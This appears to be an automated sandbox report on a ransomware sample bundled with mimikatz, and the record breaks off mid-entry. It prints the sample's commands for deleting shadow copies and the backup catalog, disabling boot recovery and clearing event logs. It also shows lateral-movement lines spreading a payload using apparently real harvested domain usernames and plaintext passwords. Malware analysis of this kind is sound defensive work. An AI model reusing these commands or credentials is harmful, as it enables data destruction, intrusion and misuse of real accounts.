mimikatz | 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471

Resubmissions

26-08-2024 09:41

240826-ln48csyerj 10

29-01-2022 07:52

220129-jqhe9sgcg5 10

Analysis

max time kernel
164s
max time network
176s
platform
windows10_x64
resource
win10-en-20211208
submitted
29-01-2022 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Size

1.8MB
MD5

59c3f3f99f44029de81293b1e7c37ed2
SHA1

fb07496900468529719f07ed4b7432ece97a8d3d
SHA256

32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471
SHA512

9b3bd8a76d754bf9c899111be986c4fd6d14f6993a9a0e3dcd9b4a76c0f7764ac8798f5cbc7a0467c1562638d85bf52f627bd32c125f587b1e838beaf03c8a0e

Score

10^/10

mimikatz discovery evasion ransomware spyware stealer

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1856	bcdedit.exe
3696	bcdedit.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral2/memory/3512-127-0x0000000180000000-0x000000018002B000-memory.dmp	mimikatz

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2656	wbadmin.exe

Executes dropped EXE 64 IoCs

pid	Process
3052	aitlh.exe
3512	dwufx.exe
4280	_hcd.exe
1712	_tjv.exe
2776	_tjv.exe
2756	_tjv.exe
2816	_tjv.exe
2780	_tjv.exe
4988	_tjv.exe
2392	_tjv.exe
4876	_tjv.exe
4572	_tjv.exe
4928	_tjv.exe
5088	_tjv.exe
2648	_tjv.exe
4656	_tjv.exe
372	_tjv.exe
1320	_tjv.exe
1336	_tjv.exe
3024	_tjv.exe
2144	_tjv.exe
2240	_tjv.exe
3096	_tjv.exe
1784	_tjv.exe
1420	_tjv.exe
3160	_tjv.exe
684	_tjv.exe
5028	_tjv.exe
4084	_tjv.exe
4480	_tjv.exe
4524	_tjv.exe
3276	_tjv.exe
1292	_tjv.exe
1580	_tjv.exe
4340	_tjv.exe
4432	_tjv.exe
1996	_tjv.exe
4840	_tjv.exe
1332	_tjv.exe
2828	_tjv.exe
3124	_tjv.exe
1452	_tjv.exe
2228	_tjv.exe
5096	_tjv.exe
2964	_tjv.exe
5076	_tjv.exe
1084	_tjv.exe
360	_tjv.exe
4496	_tjv.exe
2008	_tjv.exe
2280	_tjv.exe
4208	_tjv.exe
2460	_tjv.exe
3088	_tjv.exe
3056	_tjv.exe
3064	_tjv.exe
2368	_tjv.exe
936	_tjv.exe
2984	_tjv.exe
2988	_tjv.exe
916	_tjv.exe
3144	_tjv.exe
3944	_tjv.exe
2592	_tjv.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4324	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3512	dwufx.exe
3512	dwufx.exe
3512	dwufx.exe
3512	dwufx.exe
3512	dwufx.exe
3512	dwufx.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSecurityPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeTakeOwnershipPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeLoadDriverPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemProfilePrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemtimePrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeProfSingleProcessPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeIncBasePriorityPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeCreatePagefilePrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeBackupPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeRestorePrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeShutdownPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeDebugPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemEnvironmentPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeRemoteShutdownPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeUndockPrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeManageVolumePrivilege	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 33	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 34	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 35	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 36	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeDebugPrivilege	3512	dwufx.exe
Token: SeShutdownPrivilege	4280	_hcd.exe
Token: SeBackupPrivilege	4328	vssvc.exe
Token: SeRestorePrivilege	4328	vssvc.exe
Token: SeAuditPrivilege	4328	vssvc.exe
Token: SeBackupPrivilege	4896	wbengine.exe
Token: SeRestorePrivilege	4896	wbengine.exe
Token: SeSecurityPrivilege	4896	wbengine.exe
Token: SeSecurityPrivilege	3716	wevtutil.exe
Token: SeBackupPrivilege	3716	wevtutil.exe
Token: SeSecurityPrivilege	4372	wevtutil.exe
Token: SeBackupPrivilege	4372	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3480 wrote to memory of 3052	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	69
PID 3480 wrote to memory of 3052	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	69
PID 3480 wrote to memory of 3052	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	69
PID 3480 wrote to memory of 3512	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	70
PID 3480 wrote to memory of 3512	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	70
PID 3480 wrote to memory of 4280	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	71
PID 3480 wrote to memory of 4280	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	71
PID 3480 wrote to memory of 4280	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	71
PID 4280 wrote to memory of 4360	4280	_hcd.exe	72
PID 4280 wrote to memory of 4360	4280	_hcd.exe	72
PID 4360 wrote to memory of 4324	4360	cmd.exe	74
PID 4360 wrote to memory of 4324	4360	cmd.exe	74
PID 3480 wrote to memory of 1712	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	77
PID 3480 wrote to memory of 1712	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	77
PID 3480 wrote to memory of 1712	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	77
PID 4280 wrote to memory of 1728	4280	_hcd.exe	79
PID 4280 wrote to memory of 1728	4280	_hcd.exe	79
PID 1728 wrote to memory of 2656	1728	cmd.exe	81
PID 1728 wrote to memory of 2656	1728	cmd.exe	81
PID 3480 wrote to memory of 2756	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	82
PID 3480 wrote to memory of 2756	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	82
PID 3480 wrote to memory of 2756	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	82
PID 3480 wrote to memory of 2776	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	83
PID 3480 wrote to memory of 2776	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	83
PID 3480 wrote to memory of 2776	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	83
PID 3480 wrote to memory of 2780	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	85
PID 3480 wrote to memory of 2780	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	85
PID 3480 wrote to memory of 2780	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	85
PID 3480 wrote to memory of 2816	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	84
PID 3480 wrote to memory of 2816	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	84
PID 3480 wrote to memory of 2816	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	84
PID 3480 wrote to memory of 4988	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	91
PID 3480 wrote to memory of 4988	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	91
PID 3480 wrote to memory of 4988	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	91
PID 3480 wrote to memory of 2392	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	93
PID 3480 wrote to memory of 2392	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	93
PID 3480 wrote to memory of 2392	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	93
PID 3480 wrote to memory of 4876	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	95
PID 3480 wrote to memory of 4876	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	95
PID 3480 wrote to memory of 4876	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	95
PID 3480 wrote to memory of 4572	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	97
PID 3480 wrote to memory of 4572	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	97
PID 3480 wrote to memory of 4572	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	97
PID 3480 wrote to memory of 4928	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	99
PID 3480 wrote to memory of 4928	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	99
PID 3480 wrote to memory of 4928	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	99
PID 3480 wrote to memory of 5088	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	101
PID 3480 wrote to memory of 5088	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	101
PID 3480 wrote to memory of 5088	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	101
PID 3480 wrote to memory of 2648	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	104
PID 3480 wrote to memory of 2648	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	104
PID 3480 wrote to memory of 2648	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	104
PID 3480 wrote to memory of 4656	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	106
PID 3480 wrote to memory of 4656	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	106
PID 3480 wrote to memory of 4656	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	106
PID 3480 wrote to memory of 372	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	109
PID 3480 wrote to memory of 372	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	109
PID 3480 wrote to memory of 372	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	109
PID 3480 wrote to memory of 1320	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	111
PID 3480 wrote to memory of 1320	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	111
PID 3480 wrote to memory of 1320	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	111
PID 3480 wrote to memory of 1336	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	112
PID 3480 wrote to memory of 1336	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	112
PID 3480 wrote to memory of 1336	3480	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	112

C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
"C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3480
- C:\Users\Admin\AppData\Local\Temp\aitlh.exe
  123 \\.\pipe\9AB7AA7A-AAF7-411D-B671-CE709265C9A9
  2⤵
  - Executes dropped EXE
  PID:3052
- C:\Users\Admin\AppData\Local\Temp\dwufx.exe
  123 \\.\pipe\CA825881-C403-4389-A011-69414EAC4BD6
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Users\Admin\AppData\Local\Temp\_hcd.exe
  "C:\Users\Admin\AppData\Local\Temp\_hcd.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - \??\c:\Windows\system32\vssadmin.exe
      c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\system32\wbadmin.exe
      wbadmin.exe delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    PID:5004
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1856
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
    3⤵
    PID:3712
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl System
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
    3⤵
    PID:4004
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl Security
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4372
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1712
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2756
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2816
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2780
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4928
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:5088
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4656
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:372
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1320
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2144
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1784
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1420
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3160
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:684
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:5028
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4084
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4480
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3276
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1292
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
